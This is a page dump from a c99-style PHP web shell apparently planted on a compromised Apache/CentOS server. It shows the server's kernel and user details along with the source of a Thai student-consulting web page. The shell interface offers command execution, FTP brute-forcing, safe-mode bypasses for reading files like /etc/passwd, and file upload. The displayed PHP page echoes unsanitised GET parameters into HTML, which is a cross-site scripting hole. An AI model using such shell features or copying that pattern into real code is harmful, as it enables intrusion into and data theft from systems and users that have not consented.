!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     main.php (2.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<title>Consulting system</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Tangerine">
    <style>
      body {
        font-family: 'Prompt', sans-serif;
        font-size: 16px;
      }
    </style>
<link rel="stylesheet" href="css/pure-min.css">
<!-- Just an image -->
<nav class="navbar navbar-light bg-primary">
  <a class="navbar-brand" href="#">
    <img src="./img/logo.png" width="40" height="40" alt="">  <font color="#FFFFFF"><b>Consulting system</b></font> 
  </a>
</nav>
<ul class="breadcrumb">
<img src="https://img.icons8.com/flat_round/64/000000/home.png" width="32" height="32"> &nbsp;&nbsp;<b>ชื่อผู้ใช้งาน ::</b>&nbsp;&nbsp;<b>ID:</b>&nbsp;<font color="blue"><?=$_GET['userLogin'?></font>&nbsp;&nbsp;<b>ชื่อ-นามสกุล</b>&nbsp;&nbsp;<span class="label label-info"><font color="blue"><?=$_GET['name']?></font></span>
    &nbsp;&nbsp;&nbsp;&nbsp;
    <img src="https://img.icons8.com/flat_round/64/000000/shutdown.png" width="32" height="32" onclick="location.href='logout.php'"  >
</ul>
<script>
    function goBack() {
        window.history.back();
    }
</script>
<div class="pure-menu pure-menu-horizontal">
    
    <ul class="pure-menu-list">
        &nbsp;&nbsp;&nbsp;&nbsp;<li class="pure-menu-item pure-menu-selected"><img src="https://img.icons8.com/cute-clipart/64/000000/start-menu.png" width="40" height="40"></li>
        <li class="pure-menu-item pure-menu-has-children pure-menu-allow-hover">
            <a href="#" id="menuLink1" class="pure-menu-link">เมนูการจัดการข้อมูลการให้คำปรึกษา</a>
            <ul class="pure-menu-children">
                <li class="pure-menu-item"><a href="mem.php?name=<?=$_GET['name']?>&&User=<?=$_GET['userLogin']?>" class="pure-menu-link" target="new"><img src="img/gear.png" height="28" width="28"> บันทึกผลการให้คำปรึกษาสำหรับนักศึกษา</a></li>
                <li class="pure-menu-item"><a href="reportData.php?name=<?=$_GET['name']?>&&User=<?=$_GET['userLogin']?>" class="pure-menu-link" target="new"><img src="img/gear.png" height="28" width="28"> ข้อมูลการให้คำปรึกษา</a></li>
            </ul>
        </li>
    </ul>
</div>
</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--